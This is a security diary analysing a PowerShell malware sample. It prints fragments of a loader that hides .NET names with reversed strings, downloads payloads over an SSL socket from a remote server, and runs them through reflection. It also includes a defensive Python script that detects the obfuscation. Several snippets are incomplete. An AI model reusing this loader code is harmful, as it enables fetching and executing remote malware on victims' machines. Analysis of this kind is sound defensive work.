PowerShell Sample Extracting Payload From SSL

Published: 2020-04-10
Last Updated: 2020-04-10 09:32:46 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Another diary, another technique to fetch a malicious payload and execute it on the victim host. I spotted this piece of PowerShell code this morning while reviewing my hunting results. It implements a very interesting technique. As usual, all the code snippets below have been beautified.

First, it implements a function to reverse obfuscated strings:

function Rev($s) {
    $s = $s.ToCharArray();
    [array]::Reverse($s);   # in-place reversal of the character array (missing from the extracted snippet)
    $s = -join($s);
    return $s;
}

Here is an example:

Rev('maertSlsS.ytiruceS.teN') = 'Net.Security.SslStream'
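A triage check for this obfuscation pattern, as an added Python example (not code from the diary or from the sample): it pulls every quoted string out of a script, reverses it the way Rev() does, and reports those that decode to the .NET type and member names the sample hides. The script excerpt and the watchlist are constructed for the example.

```python
import re

# Constructed excerpt that mirrors the diary's reversed-string obfuscation (not the real sample).
CONSTRUCTED_SCRIPT = r"""
function Rev($s) { $s = $s.ToCharArray(); [array]::Reverse($s); return -join($s) }
$t1=Rev 'tneilCpcT.stekcoS.teN';
$t2=Rev 'maertSlsS.ytiruceS.teN';
$m=Rev 'tneilCsAetacitnehtuA';
$m1=Rev 'epyTteG'; $m2=Rev 'dohteMteG'; $m3=Rev 'ekovnI';
Write-Host 'hello world';
"""

# .NET names the diary shows being hidden by reversal (constructed watchlist, extend as needed).
WATCHLIST = {
    "Net.Sockets.TcpClient", "Net.Security.SslStream", "AuthenticateAsClient",
    "GetType", "GetMethod", "Invoke",
}

# Single- or double-quoted PowerShell string literals.
STRING_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def reversed_literals(script):
    """Return (literal, literal reversed char by char) for every quoted string in the script."""
    pairs = []
    for m in STRING_LITERAL.finditer(script):
        lit = m.group(1) if m.group(1) is not None else m.group(2)
        pairs.append((lit, lit[::-1]))
    return pairs


def find_hidden_names(script, watchlist=WATCHLIST):
    """Map each literal that only matches the watchlist once reversed to its decoded name."""
    hits = {}
    for lit, rev in reversed_literals(script):
        if rev in watchlist and lit not in watchlist:
            hits[lit] = rev
    return hits


def score(script):
    """Flag scripts that both carry a reverse helper and hide several watchlisted names."""
    hits = find_hidden_names(script)
    has_reverse_helper = re.search(r"\[array\]::Reverse\(", script, re.IGNORECASE) is not None
    return {"hits": hits, "reverse_helper": has_reverse_helper,
            "suspicious": has_reverse_helper and len(hits) >= 2}
```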

Easy! The core of the script implements a classic injection via 'System.Reflection.Assembly'[1]:

$data1=Get-File $ldr;
$data2=Get-File $guid;
$m1=Rev 'epyTteG';      # GetType
$m2=Rev 'dohteMteG';    # GetMethod
$m3=Rev 'ekovnI';       # Invoke
[byte[][]] $Params=@(,$data2);
$ldr.($m3)($null,$Params) | Out-Null;
;while($true){sleep 5}

You can see two calls to the Get-File() function. Where are these payloads downloaded from? Let's have a look at the function:

    if($crt -eq $null) {
        return $false
    }
    $h=New-Object -TypeName Security.Cryptography.SHA256Managed;
    $result=([string]::Compare($hs, $thumb, $true) -eq 0);
    return $result;

function Read-Data($ssl, $a) {
    $b=New-Object Byte[] $a;
    while($r -gt 0) {
        if($i -le 0){exit}
    }
    return ,$b;
}

function Get-File($val) {
    $t1=Rev 'tneilCpcT.stekcoS.teN';     # Net.Sockets.TcpClient
    $t2=Rev 'maertSlsS.ytiruceS.teN';    # Net.Security.SslStream
    $m=Rev 'tneilCsAetacitnehtuA';       # AuthenticateAsClient
    $c=New-Object $t1 $addr, $port;
    $ssl=New-Object $t2 $c.GetStream(), false, $cc;
    $aac=New-Object String 0;
    $bf=Read-Data $ssl 4;
    $ret=Read-Data $ssl $a;
    return ,$ret;
}

As you can see, the SslStream.AuthenticateAsClient method[2] is used. The data returned over the SSL connection is dumped into a variable. Here are the details (IOCs):

Unfortunately, I was not able to reach the IP address to fetch the certificate/payload. Server down or restricted connectivity from specific locations? I'm keeping an eye on the server and hope to fetch more data if it comes back online.

It's a Microsoft Azure host. I found this certificate information on PassiveTotal:

If you're interested in playing with PowerShell and certificates, Rob published a diary[3] on this topic a long time ago.

[1] https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly
[2] https://docs.microsoft.com/en-us/dotnet/api/system.net.security.sslstream.authenticateasclient
[3] https://isc.sans.edu/forums/diary/Assessing+Remote+Certificates+with+Powershell/20645/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
